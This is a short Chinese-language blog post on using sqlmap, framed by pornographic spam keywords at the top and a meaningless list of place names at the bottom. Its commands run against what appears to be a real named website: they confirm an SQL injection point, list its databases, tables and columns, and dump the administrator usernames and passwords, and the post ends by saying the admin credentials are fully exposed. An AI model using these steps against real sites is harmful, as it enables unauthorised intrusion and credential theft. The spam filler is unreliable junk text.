91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

sqlmap的使用

發布時間:2020-07-13 12:10:31 來源:網絡 閱讀:531 作者:逝去的某人 欄目:安全技術


sqlmap進行注入

1、用掃描工具可以掃出注入點這里我用一個注入點進行說明。

sqlamp.py -u “http://www.gaoneng.com/product.php?cid=71

sqlmap的使用 

可以看出此處存在sql注入漏洞。

2

sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71

--dbs 可以跑出存在的數據庫名

sqlmap的使用 

然后可以跑gaoneng數據庫中的表

Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71 -D gaoneng --tables

sqlmap的使用 

既然已經爆出數據庫里的表,那就可以爆出表中的字段

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71

-D gaoneng -T com_admin --columns

sqlmap的使用 

可以看到這個表中存在我們需要的字段,密碼與用戶名

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71 

-D gaoneng -T com_admin -C username,password --dump

sqlmap的使用 

由此這個網站的管理員密碼與用戶名已被完全爆出。


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

华蓥市| 宁安市| 永和县| 日喀则市| 牙克石市| 枣阳市| 远安县| 静安区| 清水河县| 耿马| 常宁市| 中山市| 隆尧县| 吉木萨尔县| 济南市| 盘锦市| 姚安县| 阜城县| 海阳市| 瑞昌市| 易门县| 静海县| 郑州市| 巴塘县| 临夏市| 纳雍县| 兴宁市| 颍上县| 启东市| 白沙| 竹北市| 钟山县| 阆中市| 桃江县| 仙桃市| 盘山县| 五家渠市| 平利县| 谷城县| 吴忠市| 乐业县|